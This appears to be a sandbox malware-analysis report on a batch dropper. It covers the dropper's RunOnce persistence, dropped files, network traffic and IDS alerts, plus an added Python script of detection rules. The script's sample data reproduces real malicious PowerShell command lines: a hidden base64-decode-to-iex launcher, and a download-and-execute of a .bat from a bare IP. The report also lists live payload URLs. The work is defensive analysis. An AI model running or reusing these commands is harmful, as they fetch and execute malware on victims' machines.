Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 131 009
Read events: 131 005
Write events: 4
Delete events: 0

Modification events (registry writes)

(PID 6664) powershell.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | Operation: write | Name: eFfcofbcfd | Value: C:\ProgramData\WindowsUpdate.bat
(PID 6836) powershell.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | Operation: write | Name: FFliFmAeAo | Value: C:\ProgramData\SystemService.bat
(PID 5968) powershell.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | Operation: write | Name: cAieSjmhdi | Value: C:\ProgramData\WindowsUpdate.bat
(PID 3620) powershell.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | Operation: write | Name: koAmokFfij | Value: C:\ProgramData\SystemService.bat
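Persistence here is one HKCU RunOnce value per PowerShell instance, each with a random ten-letter name and each pointing at a .bat under C:\ProgramData (WindowsUpdate.bat or SystemService.bat). The dropped-file list further down shows C:\ProgramData\WindowsUpdate.bat carrying the same MD5 and SHA256 as the submitted fix2.cmd, so the batch copies itself and re-arms for the next logon. Together with the command lines above (hidden-window relaunch; .replace and FromBase64String feeding iex; Invoke-WebRequest to a bare IP that writes a .bat and immediately runs it with Start-Process) this gives a compact detection set.

The Python below is an added example, not ANY.RUN tooling: it encodes those observations as rules and runs them over Sysmon-style records (EventID 1 process creation, EventID 13 registry value set) constructed from the command lines and RunOnce writes in this report. Field names follow Sysmon's but the records themselves are constructed; the PID 504 command line is shortened in the sample, with '...' standing for the bulk of the blob, which does not affect any rule.

```python
import re
from typing import Dict, List, Tuple

# Command-line rules. Every regex in a rule must match (case-insensitive) for the rule to fire.
# Derived from the PowerShell command lines recorded in this report.
CMDLINE_RULES: Dict[str, List[str]] = {
    # Start-Process powershell -WindowStyle Hidden ... (PID 504 and its siblings)
    "hidden_window": [r"-w(?:indowstyle)?\s+hidden\b"],
    # [Convert]::FromBase64String(...) handed to iex / Invoke-Expression
    "base64_to_iex": [r"FromBase64String", r"\b(?:iex|Invoke-Expression)\b"],
    # character-substitution obfuscation undone with .replace() before decoding
    "substitution_then_decode": [r"\.replace\(", r"FromBase64String"],
    # download cmdlet pointed at a bare IPv4 address (PID 1336)
    "download_from_raw_ip": [
        r"(?:Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|DownloadData|Start-BitsTransfer)",
        r"https?://\d{1,3}(?:\.\d{1,3}){3}[/:]",
    ],
    # a script written with -OutFile and executed in the same command line
    "dropped_script_executed": [
        r"-OutFile\s+['\"]?[^'\"\s]+\.(?:bat|cmd|vbs|js|ps1)\b",
        r"Start-Process",
    ],
}

# Registry rule: Run/RunOnce value whose data is a script in a user-writable location.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)
SCRIPT_EXT = re.compile(r"\.(?:bat|cmd|vbs|js|ps1|hta)$", re.I)
USER_WRITABLE = re.compile(r"^[A-Z]:\\(?:ProgramData|Users)\\", re.I)


def match_cmdline(cmdline: str) -> List[str]:
    """Return the names of all CMDLINE_RULES that fire on one command line."""
    return [name for name, pats in CMDLINE_RULES.items()
            if all(re.search(p, cmdline, re.I) for p in pats)]


def suspicious_run_value(target_key: str, value: str) -> bool:
    """True for a Run/RunOnce value pointing at a script under ProgramData or Users."""
    data = value.strip().strip('"')
    return bool(RUN_KEY.search(target_key) and SCRIPT_EXT.search(data) and USER_WRITABLE.match(data))


def triage(events: List[dict]) -> List[Tuple[int, str]]:
    """Run both rule sets over Sysmon-style records and return (pid, rule) hits."""
    hits: List[Tuple[int, str]] = []
    for ev in events:
        if ev["EventID"] == 1:
            hits += [(ev["ProcessId"], r) for r in match_cmdline(ev["CommandLine"])]
        elif ev["EventID"] == 13 and suspicious_run_value(ev["TargetObject"], ev["Details"]):
            hits.append((ev["ProcessId"], "runonce_script_in_programdata"))
    return hits


# Constructed records. Command lines and registry data are taken from this report; the PID 504
# blob is cut down to its first and last characters ('...' stands for the rest).
PID504_CMDLINE = r'''powershell -Command "Start-Process powershell -WindowStyle Hidden -ArgumentList '-Command \"$sofigo = ''IAAgACAAWwBOAGUAdAAu...MgAKACAA'';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($sofigo.replace(''d@'',''c'')));iex $OWjuxD\"'"'''
PID1336_CMDLINE = r'''powershell -Command "Invoke-WebRequest -Uri 'http://206.82.9.203/WindowsUpdate.bat' -OutFile 'C:\Users\admin\WindowsUpdate1.bat' -UseBasicParsing; Start-Process -FilePath 'C:\Users\admin\WindowsUpdate1.bat' -Wait"'''
PID1100_CMDLINE = r'''powershell -Command "Write-Host '20 critical errors found...' -ForegroundColor Red"'''

SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 504, "Image": "powershell.exe", "CommandLine": PID504_CMDLINE},
    {"EventID": 1, "ProcessId": 1336, "Image": "powershell.exe", "CommandLine": PID1336_CMDLINE},
    {"EventID": 1, "ProcessId": 1100, "Image": "powershell.exe", "CommandLine": PID1100_CMDLINE},
    {"EventID": 13, "ProcessId": 6664, "Image": "powershell.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\eFfcof" + "bcfd",
     "Details": r"C:\ProgramData\WindowsUpdate.bat"},
]

if __name__ == "__main__":
    for pid, rule in triage(SAMPLE_EVENTS):
        print(pid, rule)
```

The decoy Write-Host lines (PIDs 1100 and 1180, the "troubleshoot" theatre shown to the user) fire nothing, which is the intended negative case; the hidden relaunch, the decode-and-iex chain and the IP-hosted .bat fetch each fire independently, so a single hit is enough to pull the whole tree for review.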
Executable files: 0
Suspicious files: 1
Text files: 59
Unknown types: 0

Dropped files (PID and process, filename, type, hashes)

The __PSScriptPolicyTest_* files and StartupProfileData-NonInteractive are written by PowerShell itself at start-up (the script-policy test probes AppLocker/WDAC enforcement) and are not sample artefacts. The one file that matters is C:\ProgramData\WindowsUpdate.bat, whose MD5 and SHA256 are identical to the submitted fix2.cmd: the batch copies itself into ProgramData before registering that copy under RunOnce.

PID 3620 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lmosqsuy.wpm.psm1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641 / SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 4112 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1yekkyha.25v.ps1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641 / SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 4832 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_y4qe3p3g.exo.ps1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641 / SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 4112 powershell.exe: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (binary)
MD5: E6BFEDC9FF851D91F72A51053EE53924 / SHA256: 622F0668A0BAC428E3CDAC77716EC7E1260B7BAFD3A35BA71BD449B70F50FF8A
PID 4832 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3hozw5za.ik5.psm1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641 / SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 3620 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hbf0ajvv.yc5.ps1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641 / SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 4768 powershell.exe: C:\ProgramData\WindowsUpdate.bat (text; same hashes as the submitted sample)
MD5: 161BECAD962E2351D74D9921EDE038FC / SHA256: 8A9C83CA24AD90813444EC6972D9590E621D2FF40D1FA88350BD615782226E88
PID 1936 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zowu11nk.fwl.ps1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641 / SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 7040 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qwbuqxo4.lhn.psm1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641 / SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 6836 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4y33apbe.ubg.ps1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641 / SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 49
TCP/UDP connections: 50
DNS requests: 18
Threats: 14

HTTP requests (PID and process, method and HTTP code, server IP, URL, country, content type, size, reputation; rows without a PID are shown without one in the report)

The three non-Microsoft requests are the sample's own: the stage-2 batch pulled from the bare IP (9.74 Kb of text), the 2.29 Mb image.jpg carrier from i.ibb.co, and the bitbucket.org next stage, which returned 404 in this run.

PID 5944 MoUsoCoreWorker.exe | GET 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | DE | binary | 825 b | whitelisted
PID 1268 svchost.exe | GET 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted
(PID not shown) | POST 400 | 20.190.159.130:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | unknown
PID 4832 powershell.exe | GET 200 | 206.82.9.203:80 | http://206.82.9.203/WindowsUpdate.bat | US | text | 9.74 Kb | unknown
(PID not shown) | GET 200 | 45.43.142.0:443 | https://i.ibb.co/7dbGKwXZ/image.jpg?12711343 | US | image | 2.29 Mb | unknown
(PID not shown) | GET 404 | 185.166.143.49:443 | https://bitbucket.org/nbiuityt/replot/raw/main/payload_1756486488_7258.txt | DE | html | 14.9 Kb | unknown
(PID not shown) | GET 304 | 135.233.95.144:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | US | unknown
PID 3944 RUXIMICS.exe | GET 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted
(PID not shown) | POST 200 | 40.126.31.131:443 | https://login.live.com/RST2.srf | US | xml | 1.24 Kb | unknown
(PID not shown) | POST 400 | 40.126.31.3:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections (PID and process, IP:port, domain, ASN, country, reputation; excerpt of the 50 recorded, showing only Windows background traffic: the sample's own connections to 206.82.9.203, i.ibb.co and bitbucket.org are listed under HTTP requests above and in the full report)

PID 4 System | 192.168.100.255:137 | whitelisted
PID 5944 MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
PID 1268 svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
PID 3944 RUXIMICS.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
PID 4 System | 192.168.100.255:138 | whitelisted
PID 5944 MoUsoCoreWorker.exe | 23.216.77.28:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
PID 5944 MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
PID 3944 RUXIMICS.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
PID 1268 svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
PID 5944 MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted

DNS requests (domain: resolved IPs, reputation)

settings-win.data.microsoft.com: 4.231.128.59, 51.124.78.146 (whitelisted)
google.com: 142.250.185.238 (whitelisted)
crl.microsoft.com: 23.216.77.28, 23.216.77.6 (whitelisted)
www.microsoft.com: 95.101.149.131, 184.30.21.171 (whitelisted)
login.live.com: 20.190.159.71, 40.126.31.69, 20.190.159.4, 40.126.31.2, 40.126.31.67, 40.126.31.3, 40.126.31.73, 40.126.31.131 (whitelisted)
i.ibb.co: 45.43.142.2, 45.43.142.6, 45.43.142.4, 45.43.142.7, 45.43.142.5, 45.43.142.3 (shared)
bitbucket.org: 185.166.143.50, 185.166.143.49, 185.166.143.48 (whitelisted)
slscr.update.microsoft.com: 74.179.77.204 (whitelisted)
fe3cr.delivery.mp.microsoft.com: 52.165.164.15 (whitelisted)
self.events.data.microsoft.com: 20.42.65.89 (whitelisted)

Threats (PID and process, class, signature message)

PID 4832 powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
PID 6664 powershell.exe | Not Suspicious Traffic | INFO [ANY.RUN] Image hosting service ImgBB
PID 6664 powershell.exe | A Network Trojan was detected | PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
PID 6664 powershell.exe | A Network Trojan was detected | ET MALWARE ReverseLoader Reverse Base64 Encoded Executable In Image M2
PID 1936 powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
PID 1936 powershell.exe | A Network Trojan was detected | PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
PID 1936 powershell.exe | A Network Trojan was detected | ET MALWARE ReverseLoader Reverse Base64 Encoded Executable In Image M2
PID 1336 powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
PID 5968 powershell.exe | Not Suspicious Traffic | INFO [ANY.RUN] Image hosting service ImgBB
PID 5968 powershell.exe | A Network Trojan was detected | PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
No debug info